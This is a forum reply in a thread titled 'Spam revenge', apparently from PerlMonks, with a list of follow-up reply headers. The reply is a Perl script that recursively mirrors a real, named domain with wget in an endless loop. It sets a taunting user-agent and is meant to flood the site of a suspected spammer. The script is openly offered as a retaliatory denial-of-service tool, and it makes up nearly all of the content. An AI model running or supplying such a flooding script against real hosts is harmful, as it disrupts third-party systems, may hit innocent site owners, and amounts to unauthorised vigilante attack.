in reply to Re: Spam revenge
in thread Spam revenge
#!/usr/bin/perl -w $SIG{HUP} = \&end_it_all; $SIG{TERM} = \&end_it_all; $SIG{INT} = \&end_it_all; $SIG{QUIT} = \&end_it_all; $count = 0; $host = "www.BIOPROTEC.COM.BR"; while (1) { $exit = system("wget -r -l100 -U \"Stop sending me SPAM! This is the o +nly way to make you undestand.\" http://$host"); $count ++; if ($exit) { &end_it_all; } } sub end_it_all() { print "\n did some funny things some $count times... naughty, naught +y\n"; exit(0); }
|
|---|
| Replies are listed 'Best First'. | |
|---|---|
|
Re^3: Spam revenge
by Aristotle (Chancellor) on Sep 03, 2002 at 13:45 UTC | |
by Dog and Pony (Priest) on Sep 03, 2002 at 15:44 UTC | |
by Aristotle (Chancellor) on Sep 04, 2002 at 01:46 UTC | |
by Dog and Pony (Priest) on Sep 04, 2002 at 06:26 UTC | |
by Aristotle (Chancellor) on Sep 04, 2002 at 14:13 UTC |